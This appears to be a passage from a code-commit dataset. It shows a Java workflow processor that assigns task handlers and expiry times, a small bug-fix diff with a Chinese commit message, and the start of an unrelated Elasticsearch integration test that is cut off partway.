throws Exception { TaskIdentities taskIdentities = new TaskIdentities(); // 先计算强制处理人 if (!aeiObjects.getWork().getProperties().getManualForceTaskIdentityList().isEmpty()) { List<String> identities = new ArrayList<>(); identities.addAll(aeiObjects.getWork().getProperties().getManualForceTaskIdentityList()); identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } // 计算退回的结果 if (taskIdentities.isEmpty()) { Route route = aeiObjects.business().element().get(aeiObjects.getWork().getDestinationRoute(), Route.class); if ((null != route) && (StringUtils.equals(route.getType(), Route.TYPE_BACK))) { List<String> identities = new ArrayList<>(); List<WorkLog> workLogs = new ArrayList<>(); workLogs.addAll(aeiObjects.getUpdateWorkLogs()); workLogs.addAll(aeiObjects.getCreateWorkLogs()); for (WorkLog o : aeiObjects.getWorkLogs()) { if (!workLogs.contains(o)) { workLogs.add(o); } } WorkLogTree tree = new WorkLogTree(workLogs); Node node = tree.location(aeiObjects.getWork()); if (null != node) { for (Node n : tree.up(node)) { if (StringUtils.equals(manual.getId(), n.getWorkLog().getFromActivity())) { for (TaskCompleted t : aeiObjects.getTaskCompleteds()) { if (StringUtils.equals(n.getWorkLog().getFromActivityToken(), t.getActivityToken()) && BooleanUtils.isTrue(t.getJoinInquire())) { identities.add(t.getIdentity()); } } break; } } identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } } } if (taskIdentities.isEmpty()) { taskIdentities = TranslateTaskIdentityTools.translate(aeiObjects, manual); this.ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(aeiObjects, manual, taskIdentities); this.writeToEmpowerMap(aeiObjects, taskIdentities); } return taskIdentities.identities(); } // 如果活动没有找到任何可用的处理人,那么强制设置处理人为文档创建者,或者配置的 maintenanceIdentity private void ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(AeiObjects aeiObjects, Manual manual, TaskIdentities taskIdentities) throws Exception { if (taskIdentities.isEmpty()) { String identity = aeiObjects.business().organization().identity() .get(aeiObjects.getWork().getCreatorIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 标题:{}, id:{}, 强制指定处理人为活动的创建身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { identity = aeiObjects.business().organization().identity() .get(Config.processPlatform().getMaintenanceIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 也没有能找到工作创建人, 标题:{}, id:{}, 强制指定处理人为系统维护身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), aeiObjects.getActivity().getName(), aeiObjects.getActivity().getId()); } } } } // 更新授权,通过surface创建且workThroughManual=false 代表是草稿,那么不需要授权. private void writeToEmpowerMap(AeiObjects aeiObjects, TaskIdentities taskIdentities) throws Exception { // 先清空EmpowerMap aeiObjects.getWork().getProperties().setManualEmpowerMap(new LinkedHashMap<String, String>()); if (!(StringUtils.equals(aeiObjects.getWork().getWorkCreateType(), Work.WORKCREATETYPE_SURFACE) && BooleanUtils.isFalse(aeiObjects.getWork().getWorkThroughManual()))) { List<String> values = taskIdentities.identities(); values = ListUtils.subtract(values, aeiObjects.getProcessingAttributes().getIgnoreEmpowerIdentityList()); taskIdentities.empower(aeiObjects.business().organization().empower().listWithIdentityObject( aeiObjects.getWork().getApplication(), aeiObjects.getProcess().getEdition(), aeiObjects.getWork().getProcess(), aeiObjects.getWork().getId(), values)); for (TaskIdentity taskIdentity : taskIdentities) { if (StringUtils.isNotEmpty(taskIdentity.getFromIdentity())) { aeiObjects.getWork().getProperties().getManualEmpowerMap().put(taskIdentity.getIdentity(), taskIdentity.getFromIdentity()); } } } } private WorkLog findPassSameTargetWorkLog(AeiObjects aeiObjects) throws Exception { WorkLogTree tree = new WorkLogTree(aeiObjects.getWorkLogs()); List<WorkLog> parents = tree.parents(aeiObjects.getArriveWorkLog(aeiObjects.getWork())); logger.debug("pass same target rollback parents:{}.", parents); WorkLog workLog = null; for (WorkLog o : parents) { if (Objects.equals(ActivityType.manual, o.getArrivedActivityType())) { workLog = o; break; } else if (Objects.equals(ActivityType.choice, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.agent, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.invoke, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.service, o.getArrivedActivityType())) { continue; } else { break; } } logger.debug("pass same target find workLog:{}.", workLog); return workLog; } @Override protected void arrivingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { List<Work> results = new ArrayList<>(); boolean passThrough = false; List<String> identities = aeiObjects.business().organization().identity() .list(aeiObjects.getWork().getManualTaskIdentityList()); // 找到在当前环节已经处理过的已办 List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .collect(Collectors.toList()); // 去掉已经处理过的身份 identities = ListUtils.subtract(identities, ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); identities = aeiObjects.business().organization().identity().list(identities); // 现在处理人为空且没有参与流转的已办 if (identities.isEmpty() && taskCompleteds.isEmpty()) { identities = calculateTaskIdentities(aeiObjects, manual); logger.info("工作设置的处理人已经全部无效,重新计算当前环节所有处理人进行处理,标题:{}, id:{}, 设置的处理人:{}.", aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identities); // 后面进行了identitis.remove()这里必须用一个新对象包装 aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); } // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualExecute(aeiObjects.getWork().getActivityToken(), manual, Objects.toString(manual.getManualMode(), ""), identities)); switch (manual.getManualMode()) { case single: passThrough = this.single(aeiObjects, manual, identities); break; case parallel: passThrough = this.parallel(aeiObjects, manual, identities); break; case queue: passThrough = this.queue(aeiObjects, manual, identities); break; case grab: passThrough = this.single(aeiObjects, manual, identities); break; default: throw new ExceptionManualModeError(manual.getId()); } if (passThrough) { results.add(aeiObjects.getWork()); } return results; } @Override protected void executingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Route> inquiring(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes() .push(Signal.manualInquire(aeiObjects.getWork().getActivityToken(), manual)); List<Route> results = new ArrayList<>(); // 仅有单条路由 if (aeiObjects.getRoutes().size() == 1) { results.add(aeiObjects.getRoutes().get(0)); } else if (aeiObjects.getRoutes().size() > 1) { // 存在多条路由 List<TaskCompleted> taskCompletedList = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(o.getActivityToken(), aeiObjects.getWork().getActivityToken()) && aeiObjects.getWork().getManualTaskIdentityList().contains(o.getIdentity())) .collect(Collectors.toList()); String name = this.choiceRouteName(taskCompletedList, aeiObjects.getRoutes()); for (Route o : aeiObjects.getRoutes()) { if (o.getName().equalsIgnoreCase(name)) { results.add(o); break; } } } if (!results.isEmpty()) { // 清理掉强制的指定的处理人 aeiObjects.getWork().getProperties().setManualForceTaskIdentityList(new ArrayList<String>()); } return results; } // 通过已办存根选择某条路由 private String choiceRouteName(List<TaskCompleted> list, List<Route> routes) throws Exception { String result = ""; List<String> names = new ArrayList<>(); ListTools.trim(list, false, false).stream().forEach(o -> names.add(o.getRouteName())); // 进行优先路由的判断 Route soleRoute = routes.stream().filter(o -> BooleanUtils.isTrue(o.getSole())).findFirst().orElse(null); if ((null != soleRoute) && names.contains(soleRoute.getName())) { result = soleRoute.getName(); } else { // 进行默认的策略,选择占比多的 result = maxCountOrLatest(list); } if (StringUtils.isEmpty(result)) { throw new ExceptionChoiceRouteNameError( ListTools.extractProperty(list, JpaObject.id_FIELDNAME, String.class, false, false)); } return result; } private String maxCountOrLatest(List<TaskCompleted> list) { Map<String, List<TaskCompleted>> map = list.stream() .collect(Collectors.groupingBy(TaskCompleted::getRouteName)); Optional<Entry<String, List<TaskCompleted>>> optional = map.entrySet().stream().sorted((o1, o2) -> { int c = o2.getValue().size() - o1.getValue().size(); if (c == 0) { Date d1 = o1.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); Date d2 = o2.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); return ObjectUtils.compare(d2, d1); } else { return c; } }).findFirst(); return optional.isPresent() ? optional.get().getKey() : null; } private boolean single(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; Long count = aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (identities.contains(o.getIdentity()))) { return true; } else { return false; } }).count(); if (count > 0) { // 已经确定要通过此节点,清除可能是多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getId(), o.getWork()); }).forEach(o -> { // 如果启用了将未处理待办转待阅,那么进行转换 if (BooleanUtils.isTrue(manual.getManualUncompletedTaskToRead())) { aeiObjects.getCreateReads() .add(new Read(aeiObjects.getWork(), o.getIdentity(), o.getUnit(), o.getPerson())); } aeiObjects.deleteTask(o); }); // 所有预计的处理人中已经有已办,这个环节已经产生了已办,可以离开换个环节。 passThrough = true; } else { // 取到期望的待办人员,由于要进行处理需要转换成可读写List if (ListTools.isEmpty(identities)) { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), manual.getName(), manual.getId()); } // 删除多余的待办 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity()))) .forEach(aeiObjects::deleteTask); // 将待办已经产生的人从预期值中删除 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (ListTools.contains(identities, o.getIdentity()))) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } private boolean parallel(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; // 取得本环节已经处理的已办 List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由,如果有人选择了优先路由那么直接流转.需要判断是否启用了soleDirect Route soleRoute = aeiObjects.getRoutes().stream() .filter(r -> BooleanUtils.isTrue(r.getSole()) && BooleanUtils.isTrue(r.getSoleDirect())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { this.parallelSoleTaskCompleted(aeiObjects); return true; } } // 将已经处理的人从期望值中移除 aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(o -> identities.remove(o.getIdentity())); // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity())); }).forEach(aeiObjects::deleteTask); if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; // 先清空已经有待办的身份 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } // 并行环节下如果有优先路由,那么直接走优先路由,处理的时候需要晴空所有代办 private void parallelSoleTaskCompleted(AeiObjects aeiObjects) throws Exception { // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(aeiObjects::deleteTask); } private boolean queue(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由 Route soleRoute = aeiObjects.getRoutes().stream().filter(r -> BooleanUtils.isTrue(r.getSole())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { return true; } } // 存在优先路由结束 // 将已经处理的人从期望值中移除 for (TaskCompleted o : taskCompleteds) { identities.remove(o.getIdentity()); } if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; String identity = identities.get(0); // 还有人没有处理,开始判断待办,取到本环节的所有待办,理论上只能有一条待办 boolean find = false; for (Task t : aeiObjects.getTasks()) { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), t.getActivityToken())) { if (!StringUtils.equals(t.getIdentity(), identity)) { aeiObjects.deleteTask(t); } else { find = true; } } } // 当前处理人没有待办 if (!find) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } return passThrough; } // 所有有效的已办,去除 reset,retract,appendTask private List<TaskCompleted> listJoinInquireTaskCompleted(AeiObjects aeiObjects, List<String> identities) throws Exception { return aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && identities.contains(o.getIdentity()) && BooleanUtils.isTrue(o.getJoinInquire())) .collect(Collectors.toList()); } @Override protected void inquiringCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } private void calculateExpire(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { if (null != manual.getTaskExpireType()) { switch (manual.getTaskExpireType()) { case never: this.expireNever(task); break; case appoint: this.expireAppoint(manual, task); break; case script: this.expireScript(aeiObjects, manual, task); break; default: break; } } // 如果work有截至时间 if (null != aeiObjects.getWork().getExpireTime()) { if (null == task.getExpireTime()) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } else { if (task.getExpireTime().after(aeiObjects.getWork().getExpireTime())) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } } } // 已经有过期时间了,那么设置催办时间 if (null != task.getExpireTime()) { task.setUrgeTime(DateUtils.addHours(task.getExpireTime(), -2)); } else { task.setExpired(false); task.setUrgeTime(null); task.setUrged(false); } } // 从不过期 private void expireNever(Task task) { task.setExpireTime(null); } private void expireAppoint(Manual manual, Task task) throws Exception { if (BooleanUtils.isTrue(manual.getTaskExpireWorkTime())) { this.expireAppointWorkTime(task, manual); } else { this.expireAppointNaturalDay(task, manual); } } private void expireAppointWorkTime(Task task, Manual manual) throws Exception { Integer m = 0; WorkTime wt = new WorkTime(); if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * wt.minutesOfWorkDay(); } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Date expire = wt.forwardMinutes(new Date(), m); task.setExpireTime(expire); } else { task.setExpireTime(null); } } private void expireAppointNaturalDay(Task task, Manual manual) throws Exception { Integer m = 0; if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * 60 * 24; } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } private void expireScript(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { ExpireScriptResult expire = new ExpireScriptResult(); ScriptContext scriptContext = aeiObjects.scriptContext(); Bindings bindings = scriptContext.getBindings(ScriptContext.ENGINE_SCOPE); bindings.put(ScriptFactory.BINDING_NAME_TASK, task); bindings.put(ScriptFactory.BINDING_NAME_EXPIRE, expire); // 重新注入对象需要重新运行 ScriptFactory.initialScriptText().eval(scriptContext); aeiObjects.business().element() .getCompiledScript(aeiObjects.getWork().getApplication(), manual, Business.EVENT_MANUALTASKEXPIRE) .eval(scriptContext); if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getWorkHour(), 0))) { Integer m = 0; m += expire.getWorkHour() * 60; if (m > 0) { WorkTime wt = new WorkTime(); task.setExpireTime(wt.forwardMinutes(new Date(), m)); } else { task.setExpireTime(null); } } else if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getHour(), 0))) { Integer m = 0; m += expire.getHour() * 60; if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } else if (null != expire.getDate()) { task.setExpireTime(expire.getDate()); } else { task.setExpireTime(null); } } private Task createTask(AeiObjects aeiObjects, Manual manual, String identity) throws Exception { String fromIdentity = aeiObjects.getWork().getProperties().getManualEmpowerMap().get(identity); String person = aeiObjects.business().organization().person().getWithIdentity(identity); String unit = aeiObjects.business().organization().unit().getWithIdentity(identity); Task task = new Task(aeiObjects.getWork(), identity, person, unit, fromIdentity, new Date(), null, aeiObjects.getRoutes(), manual.getAllowRapid()); // 是第一条待办,进行标记 task.setFirst(ListTools.isEmpty(aeiObjects.getJoinInquireTaskCompleteds())); this.calculateExpire(aeiObjects, manual, task); if (StringUtils.isNotEmpty(fromIdentity)) { aeiObjects.business().organization().empowerLog() .log(this.createEmpowerLog(aeiObjects.getWork(), fromIdentity, identity)); String fromPerson = aeiObjects.business().organization().person().getWithIdentity(fromIdentity); String fromUnit = aeiObjects.business().organization().unit().getWithIdentity(fromIdentity); TaskCompleted empowerTaskCompleted = new TaskCompleted(aeiObjects.getWork()); empowerTaskCompleted.setProcessingType(TaskCompleted.PROCESSINGTYPE_EMPOWER); empowerTaskCompleted.setIdentity(fromIdentity); empowerTaskCompleted.setUnit(fromUnit); empowerTaskCompleted.setPerson(fromPerson); empowerTaskCompleted.setEmpowerToIdentity(identity); aeiObjects.createTaskCompleted(empowerTaskCompleted); Read empowerRead = new Read(aeiObjects.getWork(), fromIdentity, fromUnit, fromPerson); aeiObjects.createRead(empowerRead); } return task; } private EmpowerLog createEmpowerLog(Work work, String fromIdentity, String toIdentity) { return new EmpowerLog().setApplication(work.getApplication()).setApplicationAlias(work.getApplicationAlias()) .setApplicationName(work.getApplicationName()).setProcess(work.getProcess()) .setProcessAlias(work.getProcessAlias()).setProcessName(work.getProcessName()).setTitle(work.getTitle()) .setWork(work.getId()).setJob(work.getJob()).setFromIdentity(fromIdentity).setToIdentity(toIdentity) .setActivity(work.getActivity()).setActivityAlias(work.getActivityAlias()) .setActivityName(work.getActivityName()).setEmpowerTime(new Date()); } private List<String> arriving_sameJobActivityExistIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { List<String> exists = new ArrayList<>(); aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(o.getActivity(), manual.getId()) && StringUtils.equals(o.getJob(), aeiObjects.getWork().getJob()); }).forEach(o -> exists.add(o.getIdentity())); return exists; } public class ExpireScriptResult { Integer hour; Integer workHour; Date date; public Integer getHour() { return hour; } public void setHour(Integer hour) { this.hour = hour; } public Integer getWorkHour() { return workHour; } public void setWorkHour(Integer workHour) { this.workHour = workHour; } public Date getDate() { return date; } public void setDate(Date date) { this.date = date; } public void setDate(String str) { try { this.date = DateTools.parse(str); } catch (Exception e) { logger.error(e); } } } }
修复对已办的判断
o2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java
修复对已办的判断
<ide><path>2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java <ide> protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { <ide> List<Work> results = new ArrayList<>(); <ide> boolean passThrough = false; <del> List<String> identities = aeiObjects.business().organization().identity() <del> .list(aeiObjects.getWork().getManualTaskIdentityList()); <ide> // 找到在当前环节已经处理过的已办 <ide> List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() <ide> .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) <ide> .collect(Collectors.toList()); <ide> // 去掉已经处理过的身份 <del> identities = ListUtils.subtract(identities, <add> List<String> identities = ListUtils.subtract(aeiObjects.getWork().getManualTaskIdentityList(), <ide> ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); <ide> identities = aeiObjects.business().organization().identity().list(identities); <ide> // 现在处理人为空且没有参与流转的已办
Java
apache-2.0
7bb676ad4f94a1b92c1968012534cf5c925dabcd
0
robin13/elasticsearch,GlenRSmith/elasticsearch,nknize/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,robin13/elasticsearch,nknize/elasticsearch,nknize/elasticsearch,robin13/elasticsearch,GlenRSmith/elasticsearch,GlenRSmith/elasticsearch,nknize/elasticsearch,nknize/elasticsearch
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.gateway; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.state.ClusterStateResponse; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.Client; import org.elasticsearch.client.Requests; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.coordination.CoordinationMetadata; import org.elasticsearch.cluster.metadata.IndexGraveyard; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.MappingMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.IndexRoutingTable; import org.elasticsearch.cluster.routing.IndexShardRoutingTable; import org.elasticsearch.cluster.routing.RoutingTable; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.UnassignedInfo; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.CheckedConsumer; import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.xcontent.XContentFactory; import org.elasticsearch.core.internal.io.IOUtils; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.env.NodeMetadata; import org.elasticsearch.index.mapper.MapperParsingException; import org.elasticsearch.indices.IndexClosedException; import org.elasticsearch.indices.ShardLimitValidator; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.ESIntegTestCase.ClusterScope; import org.elasticsearch.test.ESIntegTestCase.Scope; import org.elasticsearch.test.InternalTestCluster.RestartCallback; import java.io.IOException; import java.nio.file.Path; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static org.elasticsearch.action.support.WriteRequest.RefreshPolicy.IMMEDIATE; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.test.NodeRoles.nonDataNode; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertHitCount; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.notNullValue; @ClusterScope(scope = Scope.TEST, numDataNodes = 0) public class GatewayIndexStateIT extends ESIntegTestCase { private final Logger logger = LogManager.getLogger(GatewayIndexStateIT.class); @Override protected boolean addMockInternalEngine() { // testRecoverBrokenIndexMetadata replies on the flushing on shutdown behavior which can be randomly disabled in MockInternalEngine. return false; } public void testMappingMetadataParsed() throws Exception { logger.info("--> starting 1 nodes"); internalCluster().startNode(); logger.info("--> creating test index, with meta routing"); client().admin().indices().prepareCreate("test") .setMapping(XContentFactory.jsonBuilder().startObject().startObject("_doc").startObject("_routing") .field("required", true).endObject().endObject().endObject()) .execute().actionGet(); logger.info("--> verify meta _routing required exists"); MappingMetadata mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata() .index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for yellow status"); ensureYellow(); logger.info("--> verify meta _routing required exists"); mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata().index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); } public void testSimpleOpenClose() throws Exception { logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> creating test index"); createIndex("test"); NumShards test = getNumShards("test"); logger.info("--> waiting for green status"); ensureGreen(); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").get(); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> creating another index (test2) by indexing into it"); client().prepareIndex("test2").setId("1").setSource("field1", "value1").execute().actionGet(); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> opening the first index again..."); assertAcked(client().admin().indices().prepareOpen("test")); logger.info("--> verifying that the state is green"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first index"); GetResponse getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for two nodes and green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> opening index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first round (before close and shutdown)"); getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("2").setSource("field1", "value1").execute().actionGet(); } public void testJustMasterNode() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startNode(nonDataNode()); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").setWaitForActiveShards(ActiveShardCount.NONE).execute().actionGet(); logger.info("--> restarting master 